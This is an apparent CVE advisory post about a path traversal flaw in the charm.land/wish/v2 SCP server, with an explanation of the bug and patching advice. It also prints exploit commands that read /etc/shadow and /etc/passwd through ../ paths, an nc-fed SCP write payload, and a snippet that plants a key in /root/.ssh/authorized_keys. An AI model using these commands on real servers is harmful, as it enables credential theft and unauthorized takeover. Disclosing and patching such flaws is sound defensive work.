charmland/wish/v2 SCP Middleware, Path Traversal, Critical

Listen to this Post

How the mentioned CVE works:

The vulnerability exists in `fileSystemHandler.prefixed()` at scp/filesystem.go:42-48. This method attempts to confine file operations to a configured root directory by cleaning the path with `filepath.Clean()` and then joining with h.root. However, `filepath.Clean()` resolves `../` sequences without rejecting them. When a malicious SCP client sends a filename containing ../../../, the cleaned path remains relative, and `filepath.Join(h.root, “../../../etc/passwd”)` produces an absolute path outside the root (e.g., /etc/passwd). Three attack vectors arise: (1) Arbitrary file write via `scp -t` – filenames parsed from SCP protocol regexes (C0644 12 ../../../tmp/pwned) are unsanitized, allowing writes anywhere. (2) Arbitrary file read via `scp -f` – the requested path from SSH command arguments passes through `prefixed()` without validation. (3) File enumeration via glob – user input with “, ?, `[` is passed to `filepath.Glob()` after prefixed(), leaking directory structures. The default authentication in `wish.go:19` accepts all connections, making the attack exploitable by unauthenticated remote attackers. Proof-of-concept integration tests confirmed reading/writing outside `/srv/data` using real SSH handshakes.

dailycve form:

Platform: charm.land/wish/v2
Version: through commit 72d67e6
Vulnerability: Arbitrary file read/write
Severity: Critical
Date: 2026-04-18

Prediction: Patch expected 2026-05-02

Analytics under heading What Undercode Say:

Check if SCP server is vulnerable to path traversal
scp -P 2222 -v attacker@target:'../../../etc/passwd' ./test_read
Detect write traversal (requires custom payload)
echo -e "C0644 12 ../../../tmp/pwned\nhello world\n\x00" | nc target 2222
Glob enumeration to list /etc
scp -P 2222 attacker@target:'../../../etc/pass' ./enum/

Exploit:

Read arbitrary file (no custom tooling)
scp -P 2222 attacker@target:../../../etc/shadow ./shadow_stolen
Write arbitrary file using crafted SCP protocol (Go snippet)
Send over SSH session: fmt.Fprintf(stdin, "C0644 12 ../../../root/.ssh/authorized_keys\n")
Then write public key and null byte.

Protection from this CVE:

  • Upgrade to patched version once available (commit after 72d67e6).
  • Apply fix in prefixed(): resolve "/"+path, join with root, and verify prefix with trailing separator.
  • Sanitize filenames in copy_from_client.go: reject any containing /, \, .., ..
  • Enforce authentication instead of default `ssh.Allowed` – require keys or passwords.

Impact:

Authenticated (or unauthenticated if default config) attacker can read any file (e.g., /etc/shadow, private keys), write any file leading to RCE via cron, authorized_keys, or systemd units, create arbitrary directories, and enumerate filesystem outside the SCP root.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top